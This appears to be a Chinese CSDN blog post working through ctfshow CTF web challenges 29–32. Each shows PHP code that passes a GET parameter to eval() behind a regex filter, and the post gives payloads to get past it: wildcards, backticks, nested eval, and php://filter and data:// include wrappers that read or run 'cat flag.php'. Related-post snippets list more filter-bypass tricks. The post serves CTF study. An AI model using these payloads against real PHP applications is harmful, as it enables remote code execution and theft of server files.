ctfshow web入门 命令执行29-32

最新推荐文章于 2023-04-16 18:43:21 发布
最新推荐文章于 2023-04-16 18:43:21 发布
阅读量579 收藏 2
点赞数 1
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ts6666a/article/details/122794631
版权

web29

<?php


error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

preg_match 函数用于执行一个正则表达式匹配。/i意味着不分大小写。本句含义是不能用flag值且忽略了大小写。说明对flag进行了过滤 解题方法:

1.利用通配符/?c=system('cat f*'); 正则表达式

2.c=echo `nl fl''ag.php`; 反引号可以将输出作为命令执行

3.?c=system('cat `ls`');用``执行ls

 

web30

 

这里是将system和flag过滤了

payload:?c=echo`nl fl*`;

web31

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

被过滤了很多cat也被过滤了

payload: c=eval($_GET[1]);&1=system('nl flag.php');先get传一个参数1在执行nl flag.php'或cat flag.php不会被过滤

web32 

<?php

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了空格和;

用include然后;用?>代替

payload:

1.c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
2.c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
 

ts6666a
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2732
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
CTFshow命令执行web29-web54
weixin_51614272的博客
02-23 2513
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 936
CTF,ctfshow,命令执行
PHP命令执行集锦
蚁景网安学院
03-21 2353
代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下...
第四届【强网杯】主动
../../../../../../../
08-24 1374
注意⚠️此题是“命令执行绕过”,不是“代码执行绕过” 下发题目打开,拿到源码 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 传入的参数如果匹配到了flag字符就输出“no flag” 测试一下,发现flag.php就在当前目录 如果要输出flag.php的内容,我们要
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
CTF中的Bypass命令执行
D.MIND 的博客
08-03 2510
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
CTFshow_命令执行
qq_45927819的博客
11-20 1252
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
CTFshow命令执行29-123
qq_43534481的博客
08-06 1436
CTFshow命令执行WP
PHP快速入门09-正则相关,附一定要学会的20个高频使用案例
黑夜开发者的博客
04-16 765
正则表达式(Regular Expression)是一种字符序列,用于描述一组字符串匹配某个模式或格式。它由一些特殊的字符和普通字符组成,可以表示一些特定的文本模式,如手机号码、邮箱、网址等等。正则表达式在很多程序设计语言中都得到了广泛应用,如Python、Java、C++等等。合理的使用正则表达式往往会使我们的效率事半功倍。^:表示匹配字符的开头。$:表示匹配字符的结尾。*:表示匹配前面的字符出现任意次数。+:表示匹配前面的字符出现至少一次。
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1678
过滤了flag可以用*或者?绕过。
ctfshow 反序列化篇
m0_62422842的博客
07-07 1754
涉及到的题目是web254~web266
黄河流域公安院校网络空间安全技能挑战赛
qq_63928796的博客
03-04 390
里让b为真就可以调用c中的sdpc方法,参数是welcom,再利用A类可以调用Evil中的getflag。将一句话木马包含在日志里并写到test.php中。php7.4有一个源码泄露的漏洞。pearcmd的利用,日志包含。考察PHP 的运算符比较级。
CTFshow web入门——命令执行
热门推荐
小元砸的博客
01-29 1万+
web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);
CTF命令执行
qq_45086218的博客
03-02 2668
文章目录通配符*号?号常用命令其他姿势 本文以ctf.show网站题目为例,总结ctf中的命令执行姿势 通配符 if(!preg_match("/flag/i", $c)){ eval($c); } *号 c=system('cat *.php'); c=system('cat f*'); ?号 c=system('cat fla?????'); c=system('cat f?????hp'); 常用命令 system() passthru() exec() shell_e
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值